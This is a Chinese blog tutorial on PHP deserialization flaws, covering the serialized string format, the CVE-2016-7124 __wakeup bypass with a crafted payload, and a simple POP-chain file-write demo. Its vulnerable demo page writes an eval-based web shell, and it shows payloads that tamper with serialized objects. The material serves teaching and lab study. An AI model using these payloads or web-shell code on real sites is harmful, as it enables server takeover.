php反序列化漏洞

最新推荐文章于 2023-04-14 23:29:19 发布
最新推荐文章于 2023-04-14 23:29:19 发布
阅读量176 收藏
点赞数
分类专栏: PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38885346/article/details/116531571
版权

一、什么是(反)序列化

(反)序列化是PHP提供的一种可以简单传输对象或者数组的方法
serialize()为序列化方法
unserialize()为反序列化方法
(反)序列化在提高传输效率的同时,也存在一些漏洞,一些是由于(反)序列化自身语法引起的,一些是由于序列化的数据是用户可控的恶意数据。

二、(反)序列化原理

这里涉及到两个很重要的魔法函数(属于被(反)序列化的类):
sleep():若该函数存在,则在序列化时会调用该函数,一般的作用是将对应的对象或者数组删除,可自定义。
wakeup():若该函数存在,则在反序列化时会调用该函数,一般的作用是重构原对象可能具有的任何资源,比如恢复数据库连接或者其他初始化,可自定义。

如下代码是序列化一个对象:

<?php
class Father
{
	private $father = 'iamfather';
}
class test extends Father
{
	private $pri = 'pri';
	protected $pro = 'pro';
	public $pub = 'pub';
	public function set_pri($pri)
    {
        $this->pri = $pri;
    }
    public function get_pri($pri)
    {
        return $this->pri;
    }
}

$object = new test();
$object->set_pri('pri');
$data = serialize($object);
echo $data;
?>

运行结果:

O:4:"test":4:{s:9:"testpri";s:3:"pri";s:6:"*pro";s:3:"pro";s:3:"pub";s:3:"pub";s:14:"Fatherfather";s:9:"iamfather";}

这里解释下该字符串各个字段的含义

  1. O:object,表示该字符串表示一个对象的序列化结果;
  2. 4:表示该对象所属类的名字长度,类test长度为4;
  3. “test”:表示该对象所属的类;
  4. 4:表示该对象所属类以及祖先类所声明的字段个数(public,private,protected),test类父类有一个private定义的字段’father’,test类本身有三个字段’pri’、‘pro’和’pub’,所以共有4个字段;
  5. {}:{}里的内容是键值对,键是字段名,值是字段名的值,中间的数字指该键或值的长度;
  6. s:string;
    :序列化字符串的所有长度都以字节为单位
    这里有个奇特的地方9:"testpri"6:"*pro"14:"Fatherfather"为什么数字和字符串看起来的长度不一样?

三、对象字段的序列化

  1. public 声明的字段序列化结果是很符合常识的,public $pub的结果就是pub
  2. protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此为了告诉你这个字段是保护字段,在序列化时字段名前面会加上0x00*0x00的前缀。这里的 0x00 表示 ASCII 码为 0的字符,即NULL,所以6:"*pro"的序列化结果其实是0x00*0x00pro,只不过null不显示,所以长度是6而不是4。
  3. private声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此为了告诉你该字段是私有字段,在序列化时字段名前面会加上0x00[declared lass name]0x00的前缀。这里 declared class name表示的是声明该私有字段的类的类名,而不是被序列化的对象的类名。因为声明该私有字段的类不一定是被序列化的对象的类,而有可能是它的祖先类,所以9:"testpri"长度不是7而是9,并且pri前面加上了所属类test,14:"Fatherfather"长度是14而不是12,并且father前面加上了所属类Father。

四、数组的序列化

<?php
$a = array(1=>1,'id'=>2,3=>3);
$data = serialize($a);
echo $data;
?>

结果:

a:3:{i:1;i:1;s:2:"id";i:2;i:3;i:3;}

五、PHP语言本身的漏洞

最经典的便是CVE-2016-7124,触发该漏洞的PHP版本为PHP5小于5.6.25或PHP7小于7.0.10。
漏洞可以简要概括为:当对象序列化字符串中表示字段个数的值大于真实的字段个数时,unserialize时会跳过_waekup()的执行。
这里有一个demo.php:

<?php
class Test
{
   private $poc = '';
   public function __construct($poc)
   {
       $this->poc = $poc;
   }
   function __destruct()
   {
       if ($this->poc != '')
       {
           file_put_contents('shell.php', '<?php eval($_GET["shell"]);?>');
           die('Success!!!');
       }
       else
       {
           die('fail to getshell!!!');
       }        
   }
   function __wakeup()
   {
       foreach(get_object_vars($this) as $k => $v)
       {
           $this->$k = null;
       }
       echo "waking up...n";
   }
}
$poc = $_GET['poc'];
if(!isset($poc))
{
   show_source(__FILE__);
   die();
}
$a = unserialize($poc);

这个php页面,接收一个poc参数,显然在这里poc是test类的实例,对poc执行unserialize(),理论上来说会先执行_wakeup(),将其中的字段/属性设为null,这样在程序结束的时候执行析构函数_destruct()时,就不会生成shell.php,
但是如果按CVE-2016-7124,只要我们传进去的序列化字符串进行改动,就可以让_wake()不执行,使得在执行_destruct()时,生成shell.php,我们来试一试。

$object = new Test('a');
$data = serialize($object);
echo $data;

结果:

O:4:"Test":1:{s:9:"Testpoc";s:1:"a";}Success!!!

{}前面的数字1表示这个对象只有一个字段,那么我们将其改成2

O:4:"Test":2:{s:9:"Testpoc";s:1:"a";}

将这个修改过的序列化结果传给demo.php。
本地PHP版本存在该漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里要注意的是,s:9:"Testpoc"前面提到过,Test前后有两个null,所以我们手动将其赋值给poc时,要在Test前后添加%00,结果url编码之后就是0x00,才能Sucess,否则返回的是 fail to getshell!!!

六、PHP反序列化与POP链

POP链其实就是PHP各个函数,类与类之间的一个调用过程,前后顺序组成了一个链条(大概是这个意思,便于理解,具体怎么解释没查到)。

前面说到过,反序列化一个很危险的地方在于数据可能受到用户控制,安全的第一要诀就是,永远不要相信用户的输入。

我们来举个例子:
popdemo.php

<?php
class popdemo
{
	private $data = "prodemon";
    private $filename = './demon.txt';
	public function get_data()
	{
		echo $this->data;
	}
    public function __wakeup()
    {
        // TODO: Implement __wakeup() method.
        $this->save($this->filename);
		$this->get_data();
    }
    public function save($filename)
    {
        file_put_contents($filename, $this->data);
    }

} 
?>

pop_serialize.php

<?php
require "./popdemo.php";
$demo = new popdemo();
file_put_contents('./pop_serialized.txt', serialize($demo));
?>

pop_unserialize.php

<?php
require "./popdemo.php";
unserialize(file_get_contents('./pop_serialized.txt'));
?>

代码过程就是,生成一个类popdemo的实例,将其序列化后再反序列化,调用_wakeup(),再调用save()函数,将data存储到filename文件中。
运行结果:
在这里插入图片描述

在这里插入图片描述

到这都是正常的
但是如果我们修改了pop_serialize.txt里面序列化字符串

O:7:"popdemo":2:{s:13:" popdemo data";s:8:"prodemon";s:17:" popdemo filename";s:11:"./demon.txt";}

改为

O:7:"popdemo":2:{s:13:" popdemo data";s:4:"hack";s:17:" popdemo filename";s:10:"./hack.txt";}

此时再访问php_unserialize.php
在这里插入图片描述
此时类中的写方法就被恶意利用了。

其实还要更符合实战的关于POP链的例子,但是我暂时也没搞明白,所以就不介绍了,大家可以去这篇文章看看,感谢原博主的分享。

太阳不绕地球转
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP反序列化漏洞
谢公子的博客
10-29 2558
目录 PHP面向对象 PHP的序列化与反序列化 序列化 反序列化 Phar反序列化 POP链构造 PHP面向对象 PHP是面向对象的程序设计语言。 在现实世界里我们所面对的事情都是对象,如计算机、电视机、自行车等。比如 Animal(动物) 是一个抽象类,我们可以具体到一只狗跟一只羊,而狗跟羊就是具体的对象,他们有颜色属性,可以写,可以跑等行为状态。 对象的主要三个特性: 对...
反序列化渗透与攻防(一)之PHP反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-12 547
序列化和反序列化几乎是工程师们每天都要面对的事情,但是要精确掌握这两个概念并不容易:一方面,它们往往作为框架的一部分出现而湮没在框架之中;另一方面,它们会以其他更容易理解的概念出现,例如加密、持久化。然而,序列化和反序列化的选型却是系统设计或重构一个重要的环节,在分布式、大数据量系统设计里面更为显著。恰当的序列化协议不仅可以提高系统的通用性、强健性、安全性、优化系统性能,而且会让系统更加易于调试、便于扩展。
php反序列化cve漏洞复现,CVE-2019-2890 Weblogic t3反序列化漏洞分析
weixin_36046574的博客
04-08 300
@Adminxe0x01 漏洞背景在WebLogic官方发布的10月份安全补丁中,包含了由Venustech ADLab提交的CVE-2019-2890的修复。该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。通过官方公告可知,该漏洞的利用条件是需要认证。0x02 影响范围Weblogic 10.3.6.0.0Weblogic 12.1.3.0.0W...
PHP反序列化漏洞(最全面最详细有例题)
m0_73728268的博客
04-14 2380
详细讲解PHP反序列化漏洞的基本原理及利用,由简入精,深入浅出;包含Docker环境搭建,例题解析;类与对象简介;序列化与反序列化基础知识;魔术方法原理及利用;POP链构造及解析;字符串逃逸;session反序列化,phar反序列化等;
PHP反序列化漏洞研究
06-17
PHP反序列化漏洞研究 PHP反序列化漏洞是指攻击者可以通过构造恶意的序列化数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
PHP反序列化漏洞.pdf
08-10
**PHP反序列化漏洞详解** PHP反序列化漏洞是一种常见的安全漏洞,主要出现在PHP应用程序中,当程序在处理用户可控的序列化数据时,没有进行有效的验证和过滤,导致攻击者能够操纵序列化的数据,从而执行任意代码...
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞详解-CTF
php反序列化漏洞1
08-04
修改 test.php,到达命令执行来的 phpinfo 覆盖了,但是并没有传入 file 文件名覆盖原来的 file 文件名)(O 是指对象,2 是后面 AA
PHP反序列化漏洞CVE-2016-7124
March
09-03 1474
影响范围 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞原理 当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行。 概念 序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象...
PHP 反序列化漏洞学习及CVE-2016-7124漏洞利用
cj_Hydra's Blog
03-02 1459
前言: 什么是php序列化和反序列化? 简单的理解:序列化就是使用serialize()将对象用字符串的方式进行表示并赋值给变量,反序列化是使用unserialize()将序列化的后字符串(这里的的字符串就是对象序列化之后的产物)构成相应的对象,反序列化是序列化的逆过程。 序列化serialize()操作: serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于...
php反序列化cve漏洞复现,CVE-2016-7124php反序列化漏洞复现
weixin_30871011的博客
04-08 433
CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP:HypertextPreproce...
PHP反序列化漏洞-CVE-2016-7124(绕过__wakeup)复现
笑花大王
01-30 2871
前言 最近电脑也不知怎么了时不时断网而且我竟然找不出原因!!!很诡异.... 其他设备电脑都OK唯独我的电脑 时好时坏 我仿佛摸清了我电脑断网的时间段所以作息时间都改变了 今天12点多断网刷了会手机陪家人取超市 看到小区门口都挺严格的进出要身份证 去超市还要测体温。之后回来睡觉到6点起来家里做了火锅hhhhh 吃了之后继续学习序列化漏洞emmmm 等会又该睡觉了 一天又结束了! ...
反序列化漏洞PHP
qq_42383069的博客
05-18 6419
反序列化漏洞 0x01. 序列化和反序列化是什么 序列化:变量转换为可保存或传输的字符串的过程; 反序列化:把序列化的字符串再转化成原来的变量使用 作用:可轻松地存储和传输数据,使程序更具维护性 0x02. 为什么会有序列化 序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构 0x03. 序列化和反序列化代码示例 <?php class User { public $username = 'admin'; public $password = '123456';
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3532
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
详解PHP反序列化漏洞
LYJ20010728的博客
05-23 2609
PHP反序列化学习序列化与反序列化定义常见使用情况常见的序列化格式反序列化中常见的魔术方法反序列化绕过protected和private绕过__wakeup绕过(CVE-2016-7124)引用利用16进制绕过字符过滤同名方法的利用绕过部分正则字符逃逸字符增多字符减少 序列化与反序列化 定义 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用; 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性; 常见的php
漏洞复现篇——Typecho反序列化漏洞
爱国小白帽
03-03 5155
实验环境: PHPstudy 火狐浏览器 Typecho 填好数据库密码和你的登录密码就可以了 安装时会报错,因为无法自动创建数据库,需要使用CREATE DATABASE typecho default charset utf8;语句手动创建数据库 ...
php代码审计_代码审计|PHP反序列化初识
weixin_39960145的博客
11-25 123
第一章 写在开头在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下。我觉得学习的时候,所有的问题都应该问3个问题:what、why、how。what:什么是反序列化,why:为什么会出现反序列化漏洞,how:反序列化漏洞如何利用。从事工作也一年了,也遇到过反序列化漏洞,发现啊,反序列化漏洞真的黑盒很难发现,即使发现了也好难利用。但是有时...
php反序列化漏洞习题
最新发布
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_phpPHP反序列化漏洞是一种安全漏洞,其中一个具体的例子是CVE-2016-7124,该漏洞存在于php5<5.6.25和php7<7.0.10的版本中。漏洞的产生原因是由于反序列化时对输入的不当处理所导致的。 了解PHP反序列化漏洞的习题,需要掌握类与对象、反序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和反序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。反序列化漏洞的成因较复杂,例如POP链构造、POC链反推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其中,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在反序列化时被绕过,从而可能导致安全漏洞PHP反序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION反序列化漏洞和phar反序列化漏洞的习题。其中,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP反序列化漏洞(最全面最详细有例题)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值